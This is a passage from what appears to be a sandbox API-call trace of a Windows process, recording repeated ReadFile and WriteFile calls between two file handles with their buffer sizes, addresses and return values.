| out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.657] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.658] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x321, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.658] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.659] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.659] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.660] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.660] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.661] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.661] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.662] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.662] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x31d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.663] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.663] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.664] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x22a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.664] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.664] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.665] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3ee, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.665] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.666] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3a2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.666] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.667] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.667] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.668] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.668] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x334, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.669] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.669] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x35a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.670] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.670] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.671] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.671] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.672] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.672] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.672] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.673] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.673] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.674] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.674] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x388, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.675] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.675] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x346, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.677] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.678] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.678] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x5e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.678] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.679] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.679] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.680] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.680] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.681] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.681] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.682] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.682] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.683] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.683] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3e2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.683] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.684] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.684] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x15a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.685] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.685] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x398, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.686] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.686] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.687] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x7f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.687] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.688] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.688] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xc3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.689] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.689] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.690] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.690] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.690] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.691] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x167, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.692] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.692] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.693] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xda, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.693] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.693] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.694] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xe7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.694] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.695] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.695] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x58, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.696] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.696] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.697] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.697] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.698] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.698] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x124, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.698] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.699] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.699] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x297, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.700] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.700] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.701] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x215, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.701] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.702] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.702] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xce, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.703] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.703] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.704] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xb9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.704] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.704] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.705] WriteFile (in: hFile=0x2b4, 